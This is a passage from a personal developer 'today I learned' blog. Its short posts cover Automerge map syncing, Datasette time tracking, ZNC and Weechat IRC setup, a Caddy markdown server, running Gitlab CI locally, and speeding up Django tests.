// Add a tile layer to add to our map, in this case using Open Street Map
L.tileLayer('https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png', {
    maxZoom: 19,
    attribution: '© OpenStreetMap contributors'
}).addTo(map);

// Initialize a GeoJSON layer and add it to the map
const geojsonFeature = {
    "type": "Feature",
    "properties": {
        "name": "Initial Feature",
        "popupContent": "This is where the journey begins!"
    },
    "geometry": {
        "type": "Point",
        "coordinates": [-0.09, 51.505]
    }
};

const geojsonLayer = L.geoJSON(geojsonFeature, {
    onEachFeature: function (feature, layer) {
        if (feature.properties && feature.properties.popupContent) {
            layer.bindPopup(feature.properties.popupContent);
        }
    }
}).addTo(map);

// Add new features to the map with a click
function onMapClick(e) {
    const newFeature = {
        "type": "Feature",
        "properties": {
            "name": "New Feature",
            "popupContent": "You clicked the map at " + e.latlng.toString()
        },
        "geometry": {
            "type": "Point",
            "coordinates": [e.latlng.lng, e.latlng.lat]
        }
    };

    // Add the new feature to the geojson layer
    geojsonLayer.addData(newFeature);
}

map.on('click', onMapClick);

Nothing fancy here, just a map which adds markers when you click. Now let’s add automerge:

We add a bunch of imports, the goal here will be to sync between tabs of the same browser. Automerge announced an automerge-repo library to help with all the wiring-up, so let’s try it out!

import { DocHandle, isValidAutomergeUrl, Repo } from '@automerge/automerge-repo'
import { BroadcastChannelNetworkAdapter } from '@automerge/automerge-repo-network-broadcastchannel'
import { IndexedDBStorageAdapter } from "@automerge/automerge-repo-storage-indexeddb"
import { v4 as uuidv4 } from 'uuid';

These were just import. Don’t bother too much. The next section does the following:

Instantiate an “automerge repo”, which helps to send the right messages to the other peers if needed ;
Add a mechanism to create and initialize a repository if needed,
or otherwise look for an existing one, based on a hash passed in the URI.

// Add an automerge repository. Sync to 
const repo = new Repo({
    network: [new BroadcastChannelNetworkAdapter()],
    storage: new IndexedDBStorageAdapter(),
});

// Automerge-repo exposes an handle, which is mainly a wrapper around the library internals.
let handle: DocHandle<unknown>

const rootDocUrl = `${document.location.hash.substring(1)}`
if (isValidAutomergeUrl(rootDocUrl)) {
    handle = repo.find(rootDocUrl);
    let doc = await handle.doc();

    // Once we've found the data in the browser, let's add the features to the geojson layer.
    Object.values(doc.features).forEach(feature => {
        geojsonLayer.addData(feature);
    });

} else {
    handle = repo.create()
    await handle.doc();
    handle.change(doc => doc.features = {});
}

Let’s change the onMapClick function:

function onMapClick(e) {
    const uuid = uuidv4();
    // ... What was there previously
    const newFeature["properties"]["id"] = uuid;

    // Add the new feature to the geojson layer.
    // Here we use the handle to do the change.
    handle.change(doc => { doc.features[uuid] = newFeature});
}

And on the other side of the logic, let’s listen to the changes:

handle.on("change", ({doc, patches}) => {
    // "patches" is a list of all the changes that happened to the tree.
    // Because we're sending JS objects, a lot of patches events are being sent.
    // 
    // Filter to only keep first-level events (we currently don't want to reflect
    // changes down the tree — yet)
    console.log("patches", patches);
    let inserted = patches.filter(({path, action}) => {
        return (path[0] == "features" && path.length == 2 && action == "put")
    });

    inserted.forEach(({path}) => {
        let uuid = path[1];
        let newFeature = doc.features[uuid];
        console.log(`Adding a new feature at position ${uuid}`)
        geojsonLayer.addData(newFeature);
    });
});

And… It’s working, here is a little video capture of two tabs working together :-)

It’s very rough, but the point was mainly to see how the library can be used, and what the API looks like. I’ve found that :

The patches object that’s being sent to the handle.on subscribers is very chatty: it contains all the changes, and I have to filter it to get what I want.
I was expecting the objects to be sent on one go, but it’s creating an operation for each change. For instance, setting a new object to a key will result in multiple events, as it will firstly create the object, and the populate it.
Here I need to keep track of all the edits, but I’m not sure how that will work out with for instance the offline use-case (or with limited connectivity). That’s what I’m going to find out next week, I guess :-)
The team behind Automerge is very welcoming, and was prompt to answer me when needed.
There seem to be another API Automerge.getHistory(), and Automerge.diff() to get a patch between the different docs, which might prove more helpful than getting all the small patches.

We’ll figure that out next week, I guess!

Using Datasette for tracking my professional activity

2023-11-11T00:00:00+01:00

I’ve been following Simon Willison since quite some time, but I’ve actually never played with his main project Datasette before.

As I’m going back into development, I’m trying to track where my time goes, to be able to find patterns, and just remember how much time I’ve worked on such and such project. A discussion with Thomas made me realize it would be nice to track all this in a spreadsheet of some sort, which I was doing until today.

Spreadsheets are nice, but they don’t play well with rich content, and doing graphs with them is kind of tricky. So I went ahead and setup everything in Datasette.

First of all, I’ve imported my .csv file into a sqlite database:

sqlite3 -csv -header db.sqlite ".import journal.csv journal"

Then, I used sqlite-utils to do some tidying and changed the columns names:

# Rename a column
sqlite-utils transform journal --rename "quoi ?" content

# Make everything look similar
sqlite-utils update db.sqlite journal project 'value.replace("Umap", "uMap")'

Here is my database schema:

sqlite-utils schema db.sqlite
CREATE TABLE "journal" (
   [date] TEXT,
   [project] TEXT,
   [duration] TEXT,
   [where] TEXT,
   [content] TEXT,
   [paid_work] INTEGER
);

And then installed datasette, with a few plugins, and ran it:

pipx install datasette
datasette install datasette-render-markdown datasette-write-ui datasette-dashboards datasette-dateutil

I then came up with a few SQL queries which are useful:

How much I’ve worked per project:

sqlite-utils db.sqlite "SELECT project, SUM(CAST(duration AS REAL)) as total_duration FROM journal GROUP BY project;"
[{"project": "Argos", "total_duration": XX},
 {"project": "IDLV", "total_duration": XX},
 {"project": "Notmyidea", "total_duration": XX},
 {"project": "Sam", "total_duration": XX},
 {"project": "uMap", "total_duration": XX}]

How much I’ve worked per week, in total (I’ve redacted the results for privacy):

sqlite-utils db.sqlite "SELECT strftime('%Y-W%W', date) AS week, SUM(CAST(duration AS REAL)) AS hours FROM journal GROUP BY week ORDER BY week;"

[{"week": "2023-W21", "hours": XX},
 {"week": "2023-W22", "hours": XX},
 {"week": "2023-W23", "hours": XX},
 {"week": "2023-W25", "hours": XX},
 {"week": "2023-W29", "hours": XX},
 {"week": "2023-W37", "hours": XX},
 {"week": "2023-W39", "hours": XX},
 {"week": "2023-W40", "hours": XX},
 {"week": "2023-W41", "hours": XX},
 {"week": "2023-W42", "hours": XX},
 {"week": "2023-W44", "hours": XX},
 {"week": "2023-W45", "hours": XX}]

I then created a quick dashboard using datasette-dashboard, which looks like this:

Using this configuration:

plugins:
  datasette-render-markdown:
    columns:
      - "content"
  datasette-dashboards:
    my-dashboard:
      title: Notmyidea
      filters:
        project:
          name: Projet
          type: select
          db: db
          query: SELECT DISTINCT project FROM journal WHERE project IS NOT NULL ORDER BY project ASC
      layout:
        - [hours-per-project]
        - [entries]
        - [hours-per-week]
      charts:
        hours-per-project:
          title: Nombre d'heures par projet
          query: SELECT project, SUM(CAST(duration AS REAL)) as total FROM journal GROUP BY project;
          db: db
          library: vega-lite
          display:
            mark: { type: arc, tooltip: true }
            encoding:
              color: { field: project, type: nominal }
              theta: { field: total, type: quantitative }
        hours-per-week:
          title: Heures par semaine
          query: SELECT strftime('%Y-W%W', date) AS week, SUM(CAST(duration AS REAL)) AS hours FROM journal GROUP BY week ORDER BY week;
          db: db
          library: vega-lite
          display:
            mark: { type: bar, tooltip: true }
            encoding:
              x: { field: week, type: ordinal}
              y: { field: hours, type: quantitative }

        entries:
          title: Journal
          db: db
          query: SELECT * FROM journal WHERE TRUE [[ AND project = :project ]] ORDER BY date DESC
          library: table
          display:

And ran datasette with:

datasette db.sqlite --root --metadata metadata.yaml

Using DISTINCT in Parent-Child Relationships

2023-10-18T00:00:00+02:00

Let’s say you have a model defined like this, with a Parent and a Child table:

class Parent(Base):
    __tablename__ = "parent"
    id: Mapped[int] = mapped_column(primary_key=True)

    childs: Mapped[List["Child"]] = relationship(back_populates="parent")


class Child(Base):
    __tablename__ = "child"
    id: Mapped[int] = mapped_column(primary_key=True)
    parent_id: Mapped[int] = mapped_column(ForeignKey("parent.id"))
    parent: Mapped["Parent"] = relationship(back_populates="children")

    born_at: Mapped[datetime] = mapped_column()

I’ve tried many ways, with complex subqueries and the like, before finding out the DISTINCT SQL statement.

So, if you want to retrieve the parent with it’s more recent child, you can do it like this:

results = (
    db.query(Parent, Child)
    .join(Child)
    .distinct(Parent.id)
    .order_by(Parent.id, desc(Child.born_at))
    .all()
)

Convert string to duration

2023-10-11T00:00:00+02:00

I found myself wanting to convert a string to a duration (int), for some configuration.

Something you can call like this:

string_to_duration("1d", target="days")
string_to_duration("1d", target="hours")
string_to_duration("3m", target="hours")
string_to_duration("3m", target="minutes")

The code :

from typing import Literal

def string_to_duration(value: str, target: Literal["days", "hours", "minutes"]):
    """Convert a string to a number of hours, days or minutes"""
    num = int("".join(filter(str.isdigit, value)))

    # It's not possible to convert from a smaller unit to a greater one:
    # - hours and minutes cannot be converted to days
    # - minutes cannot be converted to hours
    if (target == "days" and ("h" in value or "m" in value.replace("mo", ""))) or (
        target == "hours" and "m" in value.replace("mo", "")
    ):
        msg = (
            "Durations cannot be converted from a smaller to a greater unit. "
            f"(trying to convert '{value}' to {target})"
        )
        raise ValueError(msg, value)

    # Consider we're converting to minutes, do the eventual multiplication at the end.
    if "h" in value:
        num = num * 60
    elif "d" in value:
        num = num * 60 * 24
    elif "w" in value:
        num = num * 60 * 24 * 7
    elif "mo" in value:
        num = num * 60 * 24 * 30  # considers 30d in a month
    elif "y" in value:
        num = num * 60 * 24 * 365
    elif "m" in value:
        num = num
    else:
        raise ValueError("Invalid duration value", value)

    if target == "hours":
        num = num / 60
    elif target == "days":
        num = num / 60 / 24

    return num

llm command-line tips

2023-09-27T00:00:00+02:00

I’m using llm more and more, and today I had to find back prompts I used in the past. Here is a command I’ve been using, which allows me to filter the results based on what I want. It leverages sql-utils, a cli tool which is able to talk to a SQLITE database and answer in json, and jq a command-line tool capable of doing requests for json.

All in all, it’s pretty satisfying to use. I finally got a simple way to query databases! I’m also using glow, which is capable of transforming markdown into a better version on the terminal.

sqlite-utils "$(llm logs path)" "SELECT * FROM responses WHERE prompt LIKE '%search%'" | jq '.[].response' -r | glow

Which got me a colored response :-)

Setting up a IRC Bouncer with ZNC

2023-09-27T00:00:00+02:00

It’s been a while since I’ve used IRC, but I needed to connect to it today to discuss around Peewee.

The main issue with IRC is that you need to be connected to see the answer, and to get the context of the conversation. Unless… you set up a bouncer.

The bouncer is named ZNC, and the IRC client I use is Weechat.

So, that’s what I did:

Installation of ZNC

apt install znc
sudo -u _znc /usr/bin/znc --datadir=/var/lib/znc --makeconf
sudo systemctl enable znc

You can answer the questions asked by --makeconf, it will generate you a configuration file like this (stored in /var/lib/znc/configurations/znc.conf):

AnonIPLimit = 10
AuthOnlyViaModule = false
ConfigWriteDelay = 0
ConnectDelay = 5
HideVersion = false
LoadModule = webadmin
MaxBufferSize = 500
ProtectWebSessions = true
SSLCertFile = /var/lib/znc/znc.pem
SSLDHParamFile = /var/lib/znc/znc.pem
SSLKeyFile = /var/lib/znc/znc.pem
ServerThrottle = 30
Version = 1.8.2

<Listener listener0>
    AllowIRC = true
    AllowWeb = true
    IPv4 = true
    IPv6 = true
    Port = 6697
    SSL = true
    URIPrefix = /
</Listener>

<User alexis>
    Admin = true
    Allow = *
    AltNick = alexis_
    AppendTimestamp = false
    AuthOnlyViaModule = false
    AutoClearChanBuffer = true
    AutoClearQueryBuffer = true
    BindHost = skate.notmyidea.org
    ChanBufferSize = 50
    DenyLoadMod = false
    DenySetBindHost = false
    Ident = alexis
    JoinTries = 10
    LoadModule = chansaver
    LoadModule = controlpanel
    MaxJoins = 0
    MaxNetworks = 1
    MaxQueryBuffers = 50
    MultiClients = true
    Nick = alexis
    NoTrafficTimeout = 180
    PrependTimestamp = true
    QueryBufferSize = 50
    QuitMsg = See you :)
    RealName = N/A
    StatusPrefix = *
    TimestampFormat = [%H:%M:%S]

    <Network liberachat>
        FloodBurst = 9
        FloodRate = 2.00
        IRCConnectEnabled = true
        JoinDelay = 0
        LoadModule = simple_away
        RealName = N/A
        Server = irc.libera.chat +6697
        TrustAllCerts = false
        TrustPKI = true

        <Chan #peewee>
        </Chan>
    </Network>

    <Pass password>
        Hash = REDACTED
        Method = SHA256
        Salt = REDACTED
    </Pass>
</User>

You can access a web interface on the exposed port. I had to make a change in my Firefox configuration, in about:config, set network.security.ports.banned.override to 6697, otherwise, Firefox prevents you from connecting to these ports (which might actually be a good idea).

Weechat configuration

Now, to use this in weechat, here are some useful commands. First, get the fingerprint of the SSL certificate generated on your server:

cat /var/log/znc/znc.pem | openssl x509 -sha512 -fingerprint -noout | tr -d ':' | tr 'A-Z' 'a-z' | cut -d = -f 2

Then, in weechat :

/server add znc host/6697 -tls -username=<username> -password=<yourpass> -autoconnect
/set irc.server.znc.tls_fingerprint <fingerprint-goes-here>
/connect znc

And you should be all set!

Resources : The ZNC Wiki on Weechat and the Debian page on ZNC

How to run the vigogne model locally

2023-09-22T00:00:00+02:00

Vigogne is a LLM model based on LLAMA2, but trained with french data. As I’m working mostly in french, it might be useful. The current models that I can get locally are in english.

The information I’ve found online are scarse and not so easy to follow, so here is a step by step tutorial you can follow. I’m using pipenv almost everywhere now, it’s so easy :-)

llm install -U llm-llama-cpp
wget https://huggingface.co/TheBloke/Vigogne-2-7B-Chat-GGUF/resolve/main/vigogne-2-7b-chat.Q4_K_M.gguf
llm llama-cpp add-model vigogne-2-7b-chat.Q4_K_M.gguf -a vigogne
llm models default vigogne

Creating a simple command line to post snippets on Gitlab

2023-09-18T00:00:00+02:00

I’m trying to get away from Github, and one thing that I find useful is the gist utility they’re providing. Seems that gitlab provides a similar tool.

You can use it using python-gitlab:

pipx install python-gitlab

And then :

gitlab snippet create --title="youpi" --file-name="snip.py" --content snip.py --visibility="public"

I now wanted a small bash script which will just get the name of the file and infer all the parameters. I asked GPT-4, and iterated on its answer.

Here’s the resulting bash script:

#!/bin/bash

if [ -z "$1" ]
then
    echo "Please provide a filename"
    exit 1
fi

file="$1"
base=$(basename "$file")
title="$base"
visibility="public"

# Use `cat` to fetch the content of the file
content=$(cat "$file")

result=$(gitlab snippet create --title="$title" --file-name="$title" --content="$content" --visibility="$visibility")

id=$(echo "$result" | awk '/id: / { print $2 }')
echo "https://gitlab.com/-/snippets/$id"

I can now do snip README.md and that will create the snippet for me :-)

Creating an online space to share markdown files

2023-09-17T00:00:00+02:00

I wanted to create a space on my server where I can upload markdown files and have them rendered directly, for them to be shared with other people.

I stumbled on the markdown module for nginx which does exactly what I want, but seemed to ask for compilation of nginx, which wasn’t exactly what I wanted in terms of maintainability (it would make it complicated to update it)

I then thought that the Caddy server does that by default, and so I’ve tested it out. Turns out it’s not, but it offers ways to do this thanks to its template mecanism.

It also, setups automatically and transparently SSL certificates for you (using Let’s Encrypt!), so I wanted to have a look.

Here is the Caddy configuration file I’m now using :

md.notmyidea.org {
        root * /home/caddy/md.notmyidea.org
        rewrite * /index.html
        file_server
        templates
        encode zstd gzip

}

And the template:

{{$pathParts := splitList "/" .OriginalReq.URL.Path}}
{{$markdownFilename := default "index" (slice $pathParts 1 | join "/")}}

{{if not (fileExists $markdownFilename)}}
    {{httpError 404}}
{{end}}

{{$markdownFile := (include $markdownFilename | splitFrontMatter)}}
<!DOCTYPE html>
<html>
    <head>
        <title>{{ $markdownFilename }}</title>
    </head>
    <body>
        {{ markdown $markdownFile.Body }}
    </body>
</html>

This is a minimalistic version, but it works :-)

Conversion d’un fichier svg en favicon.ico

2023-09-13T00:00:00+02:00

Il y a plusieurs sites qui permettent de faire ça automatiquement, mais j’aime bien faire les choses depuis mon terminal, voici donc une commande qui permet de faire ça simplement, en utilisant ImageMagick. Merci à ce gist

convert -density 256x256 -background transparent favicon.svg -define icon:auto-resize -colors 256 favicon.ico

Découverte de nouveaux outils pour le développement: LLM, Helix et plus

2023-09-12T00:00:00+02:00

LLM

LocalAI permet de faire tourner des modèles en local avec la même API HTTP que celle d’OpenAI
Le modèle Vigogne est un modèle entrainé (fine-tuned) avec des données en Français. Notamment ce modèlequi prends LLAMA2 en entrée.
LangChain semble être un framework pour travailler avec les différents concepts utiles. A voir.

Pour la première fois, j’ai commencé à utiliser un peu plus l’outil llm pour m’aider dans les tâches de programmation.

!! warning J’utilise actuellement par défaut le modèle en ligne d’OpenAI “GTP4”, à travers leur API. Cela me pose des problèmes éthiques, mais mon approche est pour le moment de voir le type de résultats que j’obtiens pour ensuite comparer avec des modèles locaux type LLAMA2.

Deux choses que j’ai trouvées utiles :

git diff | llm "write me a commit message"
git diff | llm "find a branch name"

Qui peuvent faciliter la vie plutôt que de chercher à décrire des choses manuellement (le “branch-name”, je le trouve particulièrement utile)

J’ai aussi trouvé l’idée intéressante d’automatiser l’écrite de tests, avec pytest. Bien sur ça ne fait pas tout, mais ça donne un template de départ qui est intéressant :

cat code/test_file.py | llm "write tests for this, using pytest"

J’ai par exemple demandé à llm de me lister 20 titres pour cet article :

cat ~/dev/til.notmyidea.org/content/$(date +%F).md | llm "Liste moi 20 titres pour cet article. Quelque chose de simple"
1. "Découverte de nouveaux outils pour le développement: LLM, Helix et plus"
2. "Explorer les modèles LLM pour la génération de code"
3. "L'amélioration du développement grâce à LLM et Helix"
4. "Introduction à l'éditeur Helix et à LLM"
5. "Boostez votre productivité de développement avec LLM et Helix"
6. "Comment j'intègre LLM et Helix dans mon flux de travail de développement"
7. "Les avantages de l'utilisation de LLM pour la programmation"
8. "Approches innovantes pour le développement de code avec LLM"
9. "L'avenir du développement de code avec LLM et Helix"
10. "Optimisation des tâches de programmation avec LLM"
11. "Ouvrir de nouvelles possibilités de codage avec LLM et Helix"
12. "Utiliser des modèles LLM pour améliorer la qualité du code"

Helix

Je me mets à tester un peu plus l’éditeur Helix. Je suis un habitué de Vim pour toutes les petites modifications que je fais depuis mon terminal, et Helix semble intéressant.

xpour sélectionner une ligne (xd pour sélectionner et supprimer)
ma pour sélectionner “around” quelque chose. maw pour sélectionner le mot
c pour effacer la sélection et passer en mode insertion.

Divers

J’ai fait confiance, j’ai appris. — Thomas

J’aime beaucoup ce que ça dit. Faire confiance est peut-être nécessaire, même si on est déçu au final, on aura au moins appris. Ça me touche.

Running the Gitlab CI locally

2023-08-19T00:00:00+02:00

Sometimes, I need to change how the continuous integration is setup, and I find myself pushing to a branch to test if my changes are working. Oftentimes, it takes me multiple commits to find the correct configuration, which is… suboptimal.

I discovered today Gitlab CI local which makes it possible to run the CI actions locally, without having to push to the remote CI. The same thing exists for Microsoft Github.

Under the hood, it’s using Docker, so you need to have it running on your system, but once it’s done, you just have to issue a simple command to see the results. Very helpful :-)

Here is an example :

$ gitlab-ci-local test
parsing and downloads finished in 41 ms
test  starting python:3.8-alpine (test)
test  copied to docker volumes in 4.05 s
test  $ apk update && apk add make libsass gcc musl-dev g++
test  > fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/aarch64/APKINDEX.tar.gz
test  > fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/community/aarch64/APKINDEX.tar.gz
test  > v3.18.3-55-g2ee93b9273a [https://dl-cdn.alpinelinux.org/alpine/v3.18/main]
test  > v3.18.3-56-g4a3b0382caa [https://dl-cdn.alpinelinux.org/alpine/v3.18/community]
test  > OK: 19939 distinct packages available
test  > (1/17) Installing libgcc (12.2.1_git20220924-r10)
test  > (2/17) Installing libstdc++ (12.2.1_git20220924-r10)
test  > (3/17) Installing libstdc++-dev (12.2.1_git20220924-r10)
test  > (4/17) Installing zstd-libs (1.5.5-r4)
test  > (5/17) Installing binutils (2.40-r7)
test  > (6/17) Installing libgomp (12.2.1_git20220924-r10)
test  > (7/17) Installing libatomic (12.2.1_git20220924-r10)
test  > (8/17) Installing gmp (6.2.1-r3)
test  > (9/17) Installing isl26 (0.26-r1)
test  > (10/17) Installing mpfr4 (4.2.0_p12-r0)
test  > (11/17) Installing mpc1 (1.3.1-r1)
test  > (12/17) Installing gcc (12.2.1_git20220924-r10)
test  > (13/17) Installing musl-dev (1.2.4-r1)
test  > (14/17) Installing libc-dev (0.7.2-r5)
test  > (15/17) Installing g++ (12.2.1_git20220924-r10)
test  > (16/17) Installing libsass (3.6.5-r0)
test  > (17/17) Installing make (4.4.1-r1)
test  > Executing busybox-1.36.1-r2.trigger
test  > OK: 246 MiB in 55 packages
test  $ pip install -r requirements.txt
test  > Collecting pelican
test  >   Downloading pelican-4.8.0-py3-none-any.whl (1.4 MB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.4/1.4 MB 539.9 kB/s eta 0:00:00
test  > Collecting markdown
test  >   Downloading Markdown-3.4.4-py3-none-any.whl (94 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 94.2/94.2 kB 540.1 kB/s eta 0:00:00
test  > Collecting typogrify
test  >   Downloading typogrify-2.0.7.tar.gz (12 kB)
test  >   Preparing metadata (setup.py): started
test  >   Preparing metadata (setup.py): finished with status 'done'
test  > Collecting pelican-search
test  >   Downloading pelican_search-1.1.0-py3-none-any.whl (6.6 kB)
test  > Collecting pelican-neighbors
test  >   Downloading pelican_neighbors-1.2.0-py3-none-any.whl (16 kB)
test  > Collecting pelican-webassets
test  >   Downloading pelican_webassets-2.0.0-py3-none-any.whl (5.8 kB)
test  > Collecting libsass
test  >   Downloading libsass-0.22.0.tar.gz (316 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 316.3/316.3 kB 552.1 kB/s eta 0:00:00
test  >   Preparing metadata (setup.py): started
test  >   Preparing metadata (setup.py): finished with status 'done'
test  > Collecting docutils>=0.16
test  >   Downloading docutils-0.20.1-py3-none-any.whl (572 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 572.7/572.7 kB 549.2 kB/s eta 0:00:00
test  > Collecting rich>=10.1
test  >   Downloading rich-13.5.2-py3-none-any.whl (239 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 239.7/239.7 kB 485.3 kB/s eta 0:00:00
test  > Collecting jinja2>=2.7
test  >   Downloading Jinja2-3.1.2-py3-none-any.whl (133 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 133.1/133.1 kB 342.6 kB/s eta 0:00:00
test  > Collecting pytz>=2020.1
test  >   Downloading pytz-2023.3-py2.py3-none-any.whl (502 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 502.3/502.3 kB 547.3 kB/s eta 0:00:00
test  > Collecting pygments>=2.6
test  >   Downloading Pygments-2.16.1-py3-none-any.whl (1.2 MB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.2/1.2 MB 551.4 kB/s eta 0:00:00
test  > Collecting unidecode>=1.1
test  >   Downloading Unidecode-1.3.6-py3-none-any.whl (235 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 235.9/235.9 kB 554.2 kB/s eta 0:00:00
test  > Collecting blinker>=1.4
test  >   Downloading blinker-1.6.2-py3-none-any.whl (13 kB)
test  > Collecting python-dateutil>=2.8
test  >   Downloading python_dateutil-2.8.2-py2.py3-none-any.whl (247 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 247.7/247.7 kB 235.7 kB/s eta 0:00:00
test  > Collecting feedgenerator>=1.9
test  >   Downloading feedgenerator-2.1.0-py3-none-any.whl (21 kB)
test  > Collecting importlib-metadata>=4.4
test  >   Downloading importlib_metadata-6.8.0-py3-none-any.whl (22 kB)
test  > Collecting smartypants>=1.8.3
test  >   Downloading smartypants-2.0.1-py2.py3-none-any.whl (9.9 kB)
test  > Collecting rtoml<0.10.0,>=0.9.0
test  >   Downloading rtoml-0.9.0-cp38-cp38-musllinux_1_1_aarch64.whl (846 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 846.2/846.2 kB 503.7 kB/s eta 0:00:00
test  > Collecting webassets<3.0,>=2.0
test  >   Downloading webassets-2.0-py3-none-any.whl (142 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 142.9/142.9 kB 551.8 kB/s eta 0:00:00
test  > Collecting zipp>=0.5
test  >   Downloading zipp-3.16.2-py3-none-any.whl (7.2 kB)
test  > Collecting MarkupSafe>=2.0
test  >   Downloading MarkupSafe-2.1.3-cp38-cp38-musllinux_1_1_aarch64.whl (30 kB)
test  > Collecting six>=1.5
test  >   Downloading six-1.16.0-py2.py3-none-any.whl (11 kB)
test  > Collecting markdown-it-py>=2.2.0
test  >   Downloading markdown_it_py-3.0.0-py3-none-any.whl (87 kB)
test  >      ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 87.5/87.5 kB 561.7 kB/s eta 0:00:00
test  > Collecting typing-extensions<5.0,>=4.0.0
test  >   Downloading typing_extensions-4.7.1-py3-none-any.whl (33 kB)
test  > Collecting mdurl~=0.1
test  >   Downloading mdurl-0.1.2-py3-none-any.whl (10.0 kB)
test  > Building wheels for collected packages: typogrify, libsass
test  >   Building wheel for typogrify (setup.py): started
test  >   Building wheel for typogrify (setup.py): finished with status 'done'
test  >   Created wheel for typogrify: filename=typogrify-2.0.7-py2.py3-none-any.whl size=13452 sha256=4ce329903e807671102eab7fd2bc49765b6efc3a4ae68c82053318b62789083c
test  >   Stored in directory: /root/.cache/pip/wheels/0b/e9/98/c888501e8dd2166da059e4f8418694de9b50b48a7192712be9
test  >   Building wheel for libsass (setup.py): started
test  >   Building wheel for libsass (setup.py): still running...
test  >   Building wheel for libsass (setup.py): finished with status 'done'
test  >   Created wheel for libsass: filename=libsass-0.22.0-cp38-abi3-linux_aarch64.whl size=13710320 sha256=3dcb4ce97c1aafc179a6343e0f312c17df88e56c4eb647ab54b09ead5ee00b92
test  >   Stored in directory: /root/.cache/pip/wheels/95/64/fa/47638d5037df216387cdc168e9871d5d9851fc995d636bd108
test  > Successfully built typogrify libsass
test  > Installing collected packages: webassets, smartypants, pytz, zipp, unidecode, typogrify, typing-extensions, six, rtoml, pygments, mdurl, MarkupSafe, libsass, feedgenerator, docutils, blinker, python-dateutil, markdown-it-py, jinja2, importlib-metadata, rich, markdown, pelican, pelican-webassets, pelican-search, pelican-neighbors
test  > Successfully installed MarkupSafe-2.1.3 blinker-1.6.2 docutils-0.20.1 feedgenerator-2.1.0 importlib-metadata-6.8.0 jinja2-3.1.2 libsass-0.22.0 markdown-3.4.4 markdown-it-py-3.0.0 mdurl-0.1.2 pelican-4.8.0 pelican-neighbors-1.2.0 pelican-search-1.1.0 pelican-webassets-2.0.0 pygments-2.16.1 python-dateutil-2.8.2 pytz-2023.3 rich-13.5.2 rtoml-0.9.0 six-1.16.0 smartypants-2.0.1 typing-extensions-4.7.1 typogrify-2.0.7 unidecode-1.3.6 webassets-2.0 zipp-3.16.2
test  > WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
test  >
test  > [notice] A new release of pip is available: 23.0.1 -> 23.2.1
test  > [notice] To update, run: pip install --upgrade pip
test  $ make publish
test  > "pelican" "/gcl-builds/content" -o "/gcl-builds/public" -s "/gcl-builds/publishconf.py"
test  > Done: Processed 5 articles, 0 drafts, 0 hidden articles, 2 pages, 0 hidden pages
test  > and 0 draft pages in 0.50 seconds.
test  finished in 6 min
PASS  test

ArchLinux et mise à jour du keyring

2023-08-18T00:00:00+02:00

Pour les mises à jour Arch, j’utilise yay. Je ne fais les mises à jour que de manière semi-régulière, et parfois après une longue période je me retrouve avec des soucis de clé qui ne sont plus à jour ou manquantes.

Avec une utilisation fréquente du système, aucun problème ne se pose car un service s’occupe de faire la mise à jour des clés de manière automatique.

Pour résoudre le souci, il suffit de mettre à jour le paquet archlinux-keyring, comme décrit dans la page Wiki qui va bien.

sudo pacman -S archlinux-keyring

Python packaging with Hatch, pipx and Zsh environment variables

2023-08-17T00:00:00+02:00

It’s been a while I didn’t packaged something new. I recently remembered an old package of mine that needed some attention : debts. It’s now time to package it, so I discovered hatch

hatch new —init

This does the heavy-lifting for you, actually porting the setup.py files to the new way of packaging with python (with a pyproject.toml file)

Then hatch shell will create a development environment, install dependencies, check the pyproject.toml file in one command, and give you a shell to test whatever you need to test.

Isolating system packages

I discovered that pipx is a convenient way to install user-facing applications on my system. I use multiple virtual environments for my different projects, but not for the install that are used system-wide.

pipx seems to solve this, and avoid using sudo pip install x.

Manipulating env variables with Zsh

I use Zsh as my main shell for years, and I just discovered that it’s possible to manipulate environment variables in an easy way.

If you’re like me, you never remember how to add something to your path. You can actually use +=, like this:

path+=('/Users/alexis/.local/bin')
export PATH

Profiling and speeding up Django and Pytest

2023-08-16T00:00:00+02:00

Éloi made a pull request on IHateMoney to speedup the tests, with some great tooling for pytest that I wasn’t aware of:

pytest-xdist allows to run tests in parallel, using -n auto
pytest-profiling makes it easy to get the call stack and time the function calls that take most of the time.
You can them analyse the .prof files with Snakeviz

So, I spent some time using these on the tests for La Chariotte, because they were slow.

I found two things :

Login calls are costly in the test, and it’s possible to speed things up ;
On my machine, calls to resolve my hostname were slow, using 5s during the tests for a lookup that wasn’t even useful.

Changing the hashing algorithm to speedup tests

By default, Django uses a slow (but secure !) hashing mechanism for checking the user credentials. In the tests, we don’t need this security, but we need the speed.

Changing them to use MD5 turns out to be a way to greatly speed them up! Here is how to do it with a pytest fixture :

@pytest.fixture(autouse=True)
def password_hasher_setup(settings):
    # Use a weaker password hasher during tests, for speed
    settings.PASSWORD_HASHERS = [
        "django.contrib.auth.hashers.MD5PasswordHasher",
    ]

Speeding DNS lookups

I’m currently using a MacOSX machine, and for for whatever reason, the local lookup was not configured properly on my machine. I don’t think I did anything specific to get this wrong, so it might be your case too. Calls to resolve the local domain were tooking 5s.

If the answer to scutil --get LocalHostName, hostname and scutil --get HostName differ, then you might be in this case. Here is the fix :

sudo scutil --set HostName <YourHostName>

